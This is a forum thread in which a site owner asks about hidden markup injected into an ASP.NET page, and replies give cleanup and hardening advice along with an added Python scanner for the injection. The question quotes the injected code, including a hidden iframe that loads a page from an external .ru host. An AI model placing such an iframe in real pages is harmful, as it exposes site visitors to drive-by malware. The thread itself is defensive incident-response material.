Someone is putting this code onto my aspx page.

What are they doing?

How are they doing it?

How do I stop them?

It's on a shared hosting server.

It's on an aspx content page which has a master page and is after the </asp:content> tag...

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
+38  A: 

Take your site offline.

No, I'm being serious.

Take it offline and look at all points that you deal with user inputs and look at your code and sanitise every user input, and every output. There's plenty of documentation on XSS, Code Injection and such.

squeeks
Are you serious? This is a production site with clients. Is there a way to find where they are doing this from?
Brendan Waters
Of course I'm serious. You leave it running as it is, and search engines will crawl it with the malicious data and get you blacklisted for hosting malicious content, a banner that takes a long time to get reverted. Get your webserver logs and your code, take that site offline, clean up the code they've injected and sanitise your inputs.
squeeks
Thanks for your help and your prompt reply.
Brendan Waters
Dad got his production sites blacklisted this way... took long to get rid of.
Dykam
I'll flick the switch tonight.
Brendan Waters
Make sure you compare your source code with an existing copy you take from your revision control system. If they could modify your source code, they could easily modify other parts to leave themselves a back door (although this is probably an automated attack). They could also have compromised your whole server...
Locksfree
Turn the lights off as soon as possible. Don't wait, Googlebot won't be.
squeeks
It needs to go down ASAP. If your clients are using this and they see what's happening, I'm sure they will lose a lot of respect for your site. I sure as hell would've deleted my account and stopped dealing with you ASAP, as this proves holes in integrity and confidentiality.
ChrisAD
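The cleanup advice in this answer and its comments (find the injected markup, compare the site with a copy from revision control), as an added example that is not part of the original thread. It assumes you have downloaded the deployed files into one directory and checked out a known-good copy into another; the function names, the `SAMPLE` page and the `injected.example` host are constructed for illustration.

```python
import re
from pathlib import Path

MARKUP_EXT = {".aspx", ".ascx", ".master", ".htm", ".html"}
# An <iframe> nested inside an element styled display:none (the shape of the
# markup quoted in the question).
HIDDEN_IFRAME = re.compile(
    r'<(?P<tag>div|span|p)\b[^>]*style\s*=\s*["\'][^"\']*display\s*:\s*none'
    r'[^>]*>(?:(?!</(?P=tag)>).)*?<iframe\b[^>]*\bsrc\s*=\s*["\']?'
    r'(?P<src>[^"\'\s>]+)',
    re.IGNORECASE | re.DOTALL)
CLOSE_CONTENT = re.compile(r"</asp:content\s*>", re.IGNORECASE)
# Constructed sample: a content page with markup appended after </asp:Content>.
SAMPLE = (
    '<asp:Content ID="c1" ContentPlaceHolderID="main" runat="server">\n'
    '<p>Hello</p>\n</asp:Content>\n'
    '<div style="display:none">abcdef</div>\n'
    '<div style="display:none">ghijkl<iframe width=812 height=451 '
    'src="http://injected.example:8080/index.php" ></iframe></div>\n'
)


def scan_markup(text):
    """Return (kind, detail) findings for one page's source text."""
    findings = [("hidden-iframe", m.group("src"))
                for m in HIDDEN_IFRAME.finditer(text)]
    parts = CLOSE_CONTENT.split(text)
    tail = parts[-1].strip() if len(parts) > 1 else ""
    if tail:  # anything after the last </asp:Content>, as in the question
        findings.append(("markup-after-content", tail[:60]))
    return findings


def scan_tree(deployed, known_good):
    """Compare a downloaded copy of the site with a revision-control checkout."""
    deployed, known_good = Path(deployed), Path(known_good)
    report = {}
    for path in sorted(p for p in deployed.rglob("*") if p.is_file()):
        rel = path.relative_to(deployed).as_posix()
        findings = []
        if path.suffix.lower() in MARKUP_EXT:
            findings = scan_markup(path.read_text("utf-8", errors="replace"))
        ref = known_good / rel
        if not ref.is_file():
            findings.append(("not-in-known-good", rel))  # possible dropped file
        elif ref.read_bytes() != path.read_bytes():
            findings.append(("differs-from-known-good", rel))
        if findings:
            report[rel] = findings
    return report
```

The comparison is byte-for-byte, so line-ending changes made by an FTP client in text mode will also show up as differences.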
+1  A: 

How does the page get rendered - is there content coming from a database? What is the URL? Have you set validateRequest to false?

More info needed, I think.

Paul
Also, have you downloaded the source file for the aspx or ascx (or whatever) for the page in question? Does it look the same as your source controlled version?
Paul
No, it's got the injected code in it. I removed it last night and it's back. I also got about 16o errors on my site with my CSS files. I think they were scanning for something, but they got the path to the CSS files incorrect.
Brendan Waters
Sounds like the server has been compromised, fella. If it's a managed server, get on the phone to the host... if not, I would probably flatten and reinstall everything with new passwords. If this is not possible, change all passwords - check out user accounts on the server - remove any that you do not know about.
Paul
+2  A: 

Is it yet another Automated SQL Injection attack? Check out your logs and see if there is something with "DECLARE" in it. (assuming you are using SQL Server)

dr. evil
+1  A: 

It's on an aspx content page which has a master page and is after the </asp:content> tag...

Do you mean someone has got onto your server and edited the .aspx files on the server? If that's the case, make sure you have locked down any file shares and change all your passwords for FTP and the like.

If it's that the rendered pages have been mashed then the advice from @squeeks is the way to go.

ilivewithian
The page is dynamically driven from the database. ValidateRequest is not set to false. I don't see any weird data in the logs or the tables within the database that are affected by this page. It's outside the content tags on the aspx page... I'm beginning to think that my password has been compromised.
Brendan Waters
+2  A: 

It seems that you are not the only one. Google for it:

borjab
A: 

Try looking into the AntiXSS library; pages that are important, turn them off for a while. I believe you will need to update the code, use AntiXSS in every URL; switch all of your direct query generation to parameter-based query generation; and then, things will be under control. Also, there is a lot of stuff regarding whitelist items on Google/Bing.

KMan